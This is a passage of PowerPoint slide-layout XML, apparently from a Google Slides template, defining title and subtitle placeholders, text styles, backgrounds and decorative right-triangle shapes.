              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8"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185" name="Google Shape;185;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759435" y="3048767"/>
            <a:ext cx="2962000" cy="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186" name="Google Shape;186;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6241864" y="2681700"/>
            <a:ext cx="2612400" cy="44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400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8"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187" name="Google Shape;187;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6241835" y="3046733"/>
            <a:ext cx="2962000" cy="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188" name="Google Shape;188;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3214599" y="4357900"/>
            <a:ext cx="2612400" cy="44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400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8"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189" name="Google Shape;189;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3214601" y="4725167"/>
            <a:ext cx="2962000" cy="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190" name="Google Shape;190;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7697031" y="4358100"/>
            <a:ext cx="2612400" cy="44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400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8"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191" name="Google Shape;191;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7697000" y="4723133"/>
            <a:ext cx="2962000" cy="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192" name="Google Shape;192;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="9759233" y="4304400"/>
            <a:ext cx="2816800" cy="2731200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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3" name="Google Shape;193;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-692867" y="3182467"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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194" name="Google Shape;194;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-984967" y="3309467"/>
            <a:ext cx="4541200" cy="4403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195" name="Google Shape;195;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8970433" y="-1220733"/>
            <a:ext cx="4541200" cy="4403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196" name="Google Shape;196;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-349967" y="-2519833"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">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dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Google Shape;197;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="707633"/>
            <a:ext cx="102812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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3197336110"/>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bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 198"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Google Shape;199;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1844800" y="3076600"/>
            <a:ext cx="85024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200" name="Google Shape;200;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1494500" y="1199300"/>
            <a:ext cx="26124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201" name="Google Shape;201;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="978900" y="1555832"/>
            <a:ext cx="3643600" cy="10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202" name="Google Shape;202;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1494500" y="4637300"/>
            <a:ext cx="26124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203" name="Google Shape;203;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="978900" y="4997087"/>
            <a:ext cx="3643600" cy="10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204" name="Google Shape;204;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8085128" y="1199300"/>
            <a:ext cx="26124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205" name="Google Shape;205;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569533" y="1555832"/>
            <a:ext cx="3643600" cy="10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206" name="Google Shape;206;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8085128" y="4637500"/>
            <a:ext cx="26124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207" name="Google Shape;207;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569533" y="4994784"/>
            <a:ext cx="3643600" cy="10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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1059223576"/>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bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 208"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2741587" y="2765733"/>
            <a:ext cx="2969600" cy="43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210" name="Google Shape;210;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2741589" y="3109900"/>
            <a:ext cx="2969600" cy="67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211" name="Google Shape;211;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2741587" y="4537232"/>
            <a:ext cx="2969600" cy="43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212" name="Google Shape;212;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2741589" y="4881400"/>
            <a:ext cx="2969600" cy="67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213" name="Google Shape;213;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7259552" y="2765733"/>
            <a:ext cx="2969600" cy="43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214" name="Google Shape;214;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7259552" y="3109900"/>
            <a:ext cx="2969600" cy="67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215" name="Google Shape;215;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7259552" y="4537233"/>
            <a:ext cx="2969600" cy="43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216" name="Google Shape;216;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7259552" y="4881400"/>
            <a:ext cx="2969600" cy="67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217" name="Google Shape;217;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1949767" y="3182467"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">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218" name="Google Shape;218;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2241867" y="3309467"/>
            <a:ext cx="4541200" cy="4403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219" name="Google Shape;219;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8177033" y="-1220733"/>
            <a:ext cx="4541200" cy="4403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220" name="Google Shape;220;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955400" y="707633"/>
            <a:ext cx="102812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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4850756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accent5"/>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950967" y="1898867"/>
            <a:ext cx="8100000" cy="4346400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="609585" marR="67732" lvl="0" indent="-423323">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1219170" lvl="1" indent="-423323">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828754" lvl="2" indent="-423323">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2438339" lvl="3" indent="-423323">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3047924" lvl="4" indent="-423323">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3657509" lvl="5" indent="-423323">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4267093" lvl="6" indent="-423323">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4876678" lvl="7" indent="-423323">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5486263" lvl="8" indent="-423323">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Google Shape;22;p4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="707445"/>
            <a:ext cx="7690800" cy="70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4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23" name="Google Shape;23;p4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7744733" y="2045200"/>
            <a:ext cx="6400800" cy="6400800"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1739251054"/>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bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="191919">
            <a:alpha val="0"/>
          </a:srgbClr>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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xfrm>
            <a:off x="950967" y="4466300"/>
            <a:ext cx="2461600" cy="43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223" name="Google Shape;223;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="4810463"/>
            <a:ext cx="2461600" cy="67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224" name="Google Shape;224;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9338833" y="3372967"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:pr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dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Google Shape;225;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9592833" y="3538067"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-1016567" y="-1220733"/>
            <a:ext cx="4541200" cy="4403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227" name="Google Shape;227;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-2241867" y="-2030167"/>
            <a:ext cx="7153200" cy="33552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228" name="Google Shape;228;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3560477" y="4466300"/>
            <a:ext cx="2461600" cy="43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229" name="Google Shape;229;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3560477" y="4810463"/>
            <a:ext cx="2461600" cy="67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230" name="Google Shape;230;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6169988" y="4466300"/>
            <a:ext cx="2461600" cy="43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231" name="Google Shape;231;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6169988" y="4810463"/>
            <a:ext cx="2461600" cy="67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232" name="Google Shape;232;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779499" y="4466300"/>
            <a:ext cx="2461600" cy="43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233" name="Google Shape;233;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
